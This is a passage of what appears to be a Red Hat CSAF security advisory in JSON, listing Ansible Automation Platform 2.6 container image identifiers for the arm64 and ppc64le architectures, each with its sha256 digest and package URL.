"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774268174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3Aa490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774368903"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484033"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Ae4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774258433"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Af731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484073"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Ab8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774243862"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Af0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139334"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Aa414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774644659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Aa1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774647780"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3Abe93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774540248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3Ac67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774487884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774490244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3Abc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484549"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774485790"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774573035"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774268173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139204"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774153089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774585183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774417022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Adb0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774363040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774268174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774368903"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484033"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Af720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774258433"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484073"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Af95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3Aed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774243862"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3A09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139334"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Ad204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774644659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3Aa89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484154"
}
}
